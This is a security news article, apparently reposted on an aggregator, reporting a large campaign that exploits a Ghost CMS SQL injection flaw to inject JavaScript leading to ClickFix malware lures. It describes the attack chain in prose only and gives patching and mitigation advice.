RSS

Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

sbulaev3 pts0 comments

Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

Home<br>News<br>Security<br>Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

By Bill Toulas

May 24, 2026

10:12 AM

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.

The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.

According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Compromised sites<br>Source: XLab

CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.

This key gives management access to users, articles, and themes, and can be used to modify article pages.

Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.

SentinelOne published on February 27 details about CVE-2026-26980 being exploited in attacks and how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cleaning the script of the other to inject its own.

Timeline of the attacks<br>Source: XLab

Attack chain

The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles.

The JavaScript code is a lightweight loader that fetches second-stage code from the attacker&rsquo;s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.

Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.

The ClickFix page<br>Source: XLab

The page instructs victims to verify that they are human by pasting a provided command on their Windows command prompt, which drops a payload on their systems.

XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Attack phases<br>Source: XLab

Mitigating the risk

The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.

XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.

The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation.

The Validation Gap: Automated Pentesting Answers One Question. You Need Six.

Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold.<br>This guide covers the 6 surfaces you actually need to validate.

Download Now

Related Articles:

Drupal: Critical SQL injection flaw now targeted in attacks<br>Hackers are exploiting a critical LiteLLM pre-auth SQLi flaw<br>Hackers bypass SonicWall VPN MFA due to incomplete patching<br>Hackers exploit auth bypass flaw in Burst Statistics WordPress plugin<br>Weaver E-cology critical bug exploited in attacks since March

Actively Exploited

ClickFix

Ghost CMS

Social Engineering

SQL Injection

Vulnerability

Bill Toulas

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Previous Article

Post a Comment Community Rules

You need to login in order to post a comment

Not a member yet? Register Now

You may also like:

Upcoming Webinar

Popular Stories

Microsoft warns of new Defender zero-days exploited in attacks

Ubiquiti patches three max severity UniFi OS vulnerabilities

Google accidentally exposed details of unfixed Chromium flaw

Sponsor Posts

33% Rise in Healthcare Credential Theft in 2025: What you need to know

Overdue a password health-check? Audit your Active Directory for free

Protect Your Business from Ecommerce Fraud

Managing Shadow AI: 5 Steps to Secure Employee AI Use Without Killing Productivity

Patch management isn't enough. See why privilege is defining security risk...

ghost flaw exploited clickfix xlab injection

Related Articles

Amazon, Facebook, FBI have access to a private intelligence-sharing network

root-parent18 ptsseattle prism shield network private intelligence

SpaceX not the behemoth everyone thought

kaycebasques13 pts_blockquote instagram data vars text media

The Mirror Is Part of the Machine

london_safari10 ptstelemetry mirror decision logs enough time

Elevated error rates on requests to multiple models

recroad9 ptsclaude incident islands rates elevated error

Donald Trump and sons to be 'forever' exempt from tax audits

doener9 ptsdigital access newsletters premium financial times
terms · privacy · disclaimer · contact · policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.